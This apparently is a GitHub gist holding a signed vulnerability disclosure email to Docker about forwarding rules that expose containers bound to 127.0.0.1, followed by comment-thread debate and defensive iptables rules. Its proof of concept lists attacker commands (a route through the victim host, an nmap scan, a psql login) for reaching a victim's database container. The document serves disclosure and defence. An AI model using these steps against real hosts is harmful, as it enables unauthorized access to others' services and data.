-
-
Save guns/1dc1742dce690eb560a3a2d7581a9632 to your computer and use it in GitHub Desktop.
From self[at]sungpae.com Mon Nov 8 16:59:48 2021 | |
Date: Mon, 8 Nov 2021 16:59:48 -0600 | |
From: Sung Pae <self[at]sungpae.com> | |
To: [email protected] | |
Subject: Permissive forwarding rule leads to unintentional exposure of | |
containers to external hosts | |
Message-ID: <YYmr4l1isfH9VQCn@SHANGRILA> | |
MIME-Version: 1.0 | |
Content-Type: multipart/signed; micalg=pgp-sha256; | |
protocol="application/pgp-signature"; boundary="QR1yLfEBO/zgxYVA" | |
Content-Disposition: inline | |
X-PGP-Key: fp="4BC7 2AA6 B1AE 2B5A C7F7 ADCF 9D1A A266 D2BC 9C2D" | |
X-TUID: Avm8Mn+0Qq5s | |
--QR1yLfEBO/zgxYVA | |
Content-Type: text/plain; charset=us-ascii | |
Content-Disposition: inline | |
Hello, | |
The documentation for "docker run --publish" states: | |
> Note that ports which are not bound to the host (i.e., -p 80:80 instead of | |
> -p 127.0.0.1:80:80) will be accessible from the outside. This also applies | |
> if you configured UFW to block this specific port, as Docker manages his own | |
> iptables rules. | |
https://docs.docker.com/engine/reference/commandline/run/#publish-or-expose-port--p---expose | |
The statement above is accurate, but terribly misleading, since traffic | |
to the container's published ports from external hosts will still be | |
forwarded due to an explicit forwarding rule added to the DOCKER chain: | |
# iptables -nvL DOCKER | |
Chain DOCKER (2 references) | |
pkts bytes target prot opt in out source destination | |
0 0 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80 | |
An attacker that sends traffic to 172.17.0.2:80 *through* the docker | |
host will match the rule above and successfully connect to the | |
container, obviating any security benefit of binding the published port | |
on the host to 127.0.0.1. | |
What's worse, users who bind their published ports to 127.0.0.1 operate | |
under a false sense of security and may not bother taking further | |
precautions against unintentional exposure. | |
## Proof of Concept | |
Here is a simple proof of concept: | |
1. [VICTIM] Start a postgres container and publish its main port to | |
127.0.0.1 on the host. | |
[email protected]# docker run -e POSTGRES_PASSWORD=password -p 127.0.0.1:5432:5432 postgres | |
2. [ATTACKER] Route all packets destined for 172.16.0.0/12 through the | |
victim's machine. | |
[email protected]# ip route add 172.16.0.0/12 via 192.168.0.100 | |
3. [ATTACKER] Discover open ports on the victim's internal docker networks. | |
[email protected]# nmap -p5432 -Pn --open 172.16.0.0/12 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-05 15:00 CDT | |
Nmap scan report for 172.17.0.2 | |
Host is up (0.00047s latency). | |
PORT STATE SERVICE | |
5432/tcp open postgresql | |
4. [ATTACKER] Connect to the victim's container. | |
[email protected]# psql -h 172.17.0.2 -U postgres | |
Password for user postgres: | |
## Scope of Exposure | |
Port publishing in docker and docker-compose is a popular way to expose | |
applications and databases to developers in a cross-platform development | |
environment. | |
Web searches for the pitfalls of "--publish", as well as discussions | |
with other developers, suggest that Docker users who are aware of the | |
security implications of port publishing also believe that specifying an | |
IP address to bind on the host will effectively constrain access to the | |
service they are attempting to share. This is a reasonable conclusion | |
that can be drawn from the documentation, but the reality is that simply | |
publishing a port exposes a container to external machines regardless of | |
the IP address bound on the host. | |
Github contains tens of thousands of projects that publish container | |
ports to "127.0.0.1:xxx:xxx": | |
* https://github.com/search?q=docker+run+%22-p+127.0.0.1%3A%22&type=code | |
* https://github.com/search?q=docker+run+%22--publish+127.0.0.1%3A%22&type=code | |
* https://github.com/search?p=5&q=%22127.0.0.1%3A5432%3A5432%22&type=Code | |
* https://github.com/search?q=%22127.0.0.1%3A15432%3A5432%22&type=code | |
* https://github.com/search?q=%22127.0.0.1%3A3306%3A3306%22&type=Code | |
* https://github.com/search?p=5&q=%22127.0.0.1%3A8080%3A80%22&type=Code | |
* And many more! | |
Here is a sampling of commit messages that specifically mention the | |
security rationale behind publishing to "127.0.0.1": | |
https://github.com/rubyforgood/abalone/commit/764a619babc7ac05fe9fe6edc63e9128a2c86af3 | |
> Forward the "db" service's port to the host's loopback interface, so | |
> that a developer could choose to use docker-compose only for a container | |
> to run the database while running all the Ruby processes on their host | |
> computer. "127.0.0.1:5432:5432" was chosen over "5432:5432" so that the | |
> PostgreSQL would not be available to all other computers on the host | |
> computer's network (say, a coffee shop wifi). | |
https://github.com/MayankTahil/pref/commit/f3056408867a227e9ff6b338c51ef37d605f5dad | |
> [SECURITY] Limit port export to localhost | |
> | |
> It's prevents leak private developed projects vie Eth & Wi-Fi interfaces. | |
> You now must use `localhost` host or use host mapped directly to 127.0.0.1 | |
https://github.com/open-edge-insights/eii-core/commit/7a85ab8ed818af73a83489554eb5737394a4cf0c | |
> Docker Security: Port mapping and default security options | |
> | |
> Changes: | |
> | |
> 1) Provide secuiry options in docker-compose file related to selinux and resticted privilages | |
> 2) Set HOST_IP as Environment Variable in Compose startup | |
> 2) Bind all ports to either 127.0.0.1 or Host IP | |
## Mitigation | |
While the unintentional exposure of published container ports can be | |
mitigated by constraining access to containers in the DOCKER-USER chain, | |
my observation is that most Linux users do not know how to configure | |
their firewalls and have not added any rules to DOCKER-USER. The few | |
users that do know how to configure their firewalls are likely to be | |
unpleasantly surprised that their existing FORWARD rules have been | |
preceded by Docker's own forwarding setup. | |
In light of this, an effective mitigation should: | |
1. Restrict the source addresses and/or interfaces that are allowed to | |
communicate with the published container port. | |
For example, "docker run -p 127.0.0.1:5432:5432" creates the | |
following rule in the DOCKER chain: | |
Chain DOCKER (2 references) | |
pkts bytes target prot opt in out source destination | |
0 0 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:5432 | |
It should, however, restrict the source ip address range to | |
127.0.0.1/8 and the in-interface to the loopback interface: | |
Chain DOCKER (2 references) | |
pkts bytes target prot opt in out source destination | |
0 0 ACCEPT tcp -- lo docker0 127.0.0.1/8 172.17.0.2 tcp dpt:5432 | |
The values of "127.0.0.1/8" and "lo" can be retrieved from the | |
interface on which 127.0.0.1 is defined. For instance, if a machine | |
has an IP address of 192.168.0.100 on a /24 network on eth0 and the | |
user runs "docker run -p 192.168.0.100:5432:5432", we would expect to | |
see the following: | |
Chain DOCKER (2 references) | |
pkts bytes target prot opt in out source destination | |
0 0 ACCEPT tcp -- eth0 docker0 192.168.0.0/24 172.17.0.2 tcp dpt:5432 | |
2. Default to "127.0.0.1" when a bind address is not supplied to "--publish". | |
This is a breaking change, but it should have been the default from | |
the beginning. | |
## Conclusion | |
Docker port publishing is an *extremely* popular feature, and at | |
present, virtually all users that use containers with published ports | |
are exposed to attackers that have noticed the oversight outlined in | |
this email. | |
I have not noticed any discussion online of attackers using custom | |
routes to gain access to containers, but it is an obvious attack, and | |
perhaps unfortunately, I posted a comment about this vulnerability in a | |
related Github issue: | |
https://github.com/moby/moby/issues/22054#issuecomment-962202433 | |
Thank you for your attention to this. | |
Sung Pae | |
https://github.com/guns | |
--QR1yLfEBO/zgxYVA | |
Content-Type: application/pgp-signature; name="signature.asc" | |
-----BEGIN PGP SIGNATURE----- | |
iQIzBAABCAAdFiEES8cqprGuK1rH963PnRqiZtK8nC0FAmGJq+IACgkQnRqiZtK8 | |
nC3TvBAAka0sVXX4X2k8BIzVUoojrM1OkOBzAZl76cdI1Zmv4P6sp/zmkR7iE5eV | |
lUQ57cLwnalbbn9e0QyVA2/jcuB96cx8bKL8jy+JnJ0IuQ4VUYEWGTkLORIojDRJ | |
I8imGY83Bz4fyffoMUxG3DBeuJJCOHIHFbcoijI4xYPz2ujY3KR0vC0UYxcZLv92 | |
bD1thh/bFXaPOPBHlVCUB9hFq1/JZ27XaH9GZ7X7TeuOp25JriU1h3U/A6gsGTkK | |
OBOjRVJV30tDnsVZa8TBvL27JfLGyRvGACpnOhaozSvVgePERDBeMsH6bjDNzWEs | |
mb9QIsxA6brZdJdH1uXJDM36nhG1eT3OM7jrZzI76+7FT2yzrQcKsk2Oes0t9ZCq | |
wyZbVoZGExam2bPiWvu9XJVb9TPwKpxXpLPyiuFZrlrOaBfDV1ZqFMSBXZJxFOuu | |
PEysiYTUpq+FufGJxH5JqWERLh79TV/f+654DG/UtOas+A7Rjy6hF9OsDXDWzpz/ | |
lo7w3OKaXqvNZ2ysL8ihHp963fFLPkhMn2JAOBsoFa3s/hCCBwFJjxHnzF9gNRhZ | |
cr9f3wlk6IVJMSARPJsZCD+g5uaU1gzDbndem3SlMLjkJ4D6rLoZ3zhmkddjKhsv | |
CLBL6R7nEmuBcb4e97EVmCnYR8221uXmqvc2bQwPpeTLeGMG5BQ= | |
=+qVS | |
-----END PGP SIGNATURE----- | |
--QR1yLfEBO/zgxYVA-- |
Thank you for the information but I am not sure how critical this is.
This seems critical if the host that runs the docker container (192.168.0.100 in your example) allows traffic from external machines to go through. And again it is critical if one leaves the docker network the default network (and I wouldn't suggest that) without further management of the DOCKER_USER firewall chain (where one can state "if packets come from not allowed sources, block").
What for me is not self evident is (and thus making the entire thing not that critical):
- why should I route traffic from external machines while at the time time running docker containers:
- why should I use the default docker network for my workload;
- why shouldn't I set proper iptables rules in DOCKER-USER;
Also even if I allow external machines to go through my firewall because why not, the entire thing is solved by an iptables rules that state "if a packet coming from the external interface wants to reach the following network , drop it" (this can be added in nat prerouting). One may say "but in this way you kill outbound connections!" Nope. If a packet from outside the host wants to reach an internal network (that is not exposed externally) on the host, before any DNAT rules or whatever translation rules, then the packet can be dropped. Although @peterwwillis has a nicer solution for it.
The established norm when binding to an external interface is that the entire outside world can reach it
This is only true for a host on the Internet with a single "external" interface. A machine can join multiple networks, and an application can choose to listen for connections on a subset of those networks that are not reachable from the Internet.
For example, a typical home router has an IP address on the Internet (e.g. 93.184.216.34
), and it also has an IP address on the local network it creates (e.g. 192.168.0.1/24
). A user that starts an application on this router and binds it to 192.168.0.1:1234
can reasonably expect that only other machines on the 192.168.0.0/24
network will be able to connect to the service.
The conventional way to ask an application to accept connections from all hosts is to specify the special bind address 0.0.0.0
. You can search for INADDR_ANY
to read up on this topic.
- why should I route traffic from external machines while at the time time running docker
The trouble here is that even if you start with an empty FORWARD chain with the policy set to DROP (i.e. block all forwarding attempts in either direction), dockerd inserts its own rules into the FORWARD chain that explicitly allow external machines to access your containers. This behavior is dangerous because it defeats a previously secure firewall setup.
- why should I use the default docker network for my workload;
This issue is unrelated to the internal docker network. In fact, I stumbled on this exposure while working on a container on a custom network.
why shouldn't I set proper iptables rules in DOCKER-USER
You should. I have the following iptables rules on my work machine:
-A DOCKER-USER -o br-+ -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
-A DOCKER-USER -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
-A DOCKER-USER -i br-+ -m comment --comment DOCKER-outbound -j RETURN
-A DOCKER-USER -i docker0 -m comment --comment DOCKER-outbound -j RETURN
-A DOCKER-USER -j REJECT
https://github.com/guns/haus/blob/master/share/iptables/iptables.script#L151-L158
The problem is that approximately dozens of users worldwide know that this is necessary when using --publish 127.0.0.1:port:port
. A default behavior that violates assumptions about binding to 127.0.0.1 and undermines secure firewalls is an issue that requires fixing even if can be mitigated by the user.
The established norm when binding to an external interface is that the entire outside world can reach it
This is only true for a host on the Internet with a single "external" interface. A machine can join multiple networks, and an application can choose to listen for connections on a subset of those networks that are not reachable from the Internet.
For example, a typical home router has an IP address on the Internet (e.g.
93.184.216.34
), and it also has an IP address on the local network it creates (e.g.192.168.0.1/24
). A user that starts an application on this router and binds it to192.168.0.1:1234
can reasonably expect that only other machines on the192.168.0.0/24
network will be able to connect to the service.
I think you are confusing unroutable addresses with what happens when specific addresses/interfaces are bound. Having multiple interfaces or addresses etc has nothing to do with it.
I suggest you read up about how IP (internet protocol) routing works in its simplest form. It might be good to start with RFC1918 because it covers in detail the address spaces of which your example 192.168.0.0/24
is a subset. There is no presumption that only link-local clients are allowed to connect.
In your example, the reason the home network reasonably expects the public internet not to be able to reach a listening server is that RFC1918 addresses are not routable from the public non-1918 internet.
If you had other networks - for example a 192.168.1.0/24 network - on the inside of your external router, and working routes (either explicit or default) between those networks, and you had a listener at 192.168.0.1, you would need a firewall to intercept traffic to prevent it being accessible from 192.168.1.0/24.
I hope this ramble helped ;)
It might be good to start with RFC1918 because it covers in detail the address spaces of which your example 192.168.0.0/24 is a subset. There is no presumption that only link-local clients are allowed to connect.
I chose to illustrate with a router because of your comment about the "entire outside world", but it appears this has confused the discussion. My point is that a machine can belong to two different networks whose traffic can be isolated from each other, and therefore binding to one IP address on one network versus binding to all IP addresses on all networks has some utility. It just happens that in my example packets bound for private addresses are not allowed on public networks.
If you had other networks - for example a 192.168.1.0/24 network - on the inside of your external router, and working routes (either explicit or default) between those networks, and you had a listener at 192.168.0.1, you would need a firewall to intercept traffic to prevent it being accessible from 192.168.1.0/24.
Yes, you're correct. In this example you'd need a firewall rule to restrict access to hosts in 192.168.0.0/24
.
So maybe you can clarify your statement:
The established norm when binding to an external interface is that the entire outside world can reach it
If my machine joins two networks and I properly isolate traffic from each, my expectation when binding to one IP address is that only traffic from that associated network will reach the listening socket. Is this untrue?
This discussion relates to --publish
in that restricting --publish 192.168.0.1:1234:1234
to the interface and network to which that IP address belongs mirrors the equivalent setup required to bind and isolate a listening socket on 192.168.0.1:1234
.
You asked if this is going too far, and I believe it is not, because a user that wants to accept traffic from all hosts can use --publish 0.0.0.0:1234:1234
.
The trouble here is that even if you start with an empty FORWARD chain with the policy set to DROP (i.e. block all forwarding attempts in either direction), dockerd inserts its own rules into the FORWARD chain that explicitly allow external machines to access your containers. This behavior is dangerous because it defeats a previously secure firewall setup.
Ok, then I'll need to test this. I can see it can happen but if I am not mistaken the docker added rules don't come early enough, I'll have to check.
The problem is that approximately dozens of users worldwide know that this is necessary when using --publish 127.0.0.1:port:port. A default behavior that violates assumptions about binding to 127.0.0.1 and undermines secure firewalls is an issue that requires fixing even if can be mitigated by the user.
I agree. I consider myself to be an advanced user and even I didn't think docker would expose services that I'd assume were bound to the lo interface, but are actually accessible remotely by default. And it's insidious because if you just portscan your machine you wouldn't see it either.
I might try to open a PR for their documentation page on iptables to clarify the behavior and a stopgap fix
-A DOCKER-USER -o br-+ -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN -A DOCKER-USER -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN -A DOCKER-USER -i br-+ -m comment --comment DOCKER-outbound -j RETURN -A DOCKER-USER -i docker0 -m comment --comment DOCKER-outbound -j RETURN -A DOCKER-USER -j REJECT
Is that enough? Could an attacker on the local network mess up with conntrack (sending forged SYN, SYN+ACK, ACK)? Is it not necessary to add something like:
iptables -t raw -A PREROUTING -m rpfilter --invert -j DROP
This is awesome, but doesn't the proposed handling of
docker run -p 192.168.0.100:5432:5432
in line 170 go too far?The established norm when binding to loopback is that the entire outside world cannot reach it1
The established norm when binding to an external interface is that the entire outside world can reach it1
Do I need a lesson in container networking, or does your proposal say that we'd expect only local-net addresses to be able to reach a deliberately-exposed port?
Footnotes
subject to firewalls etc ofc ↩ ↩2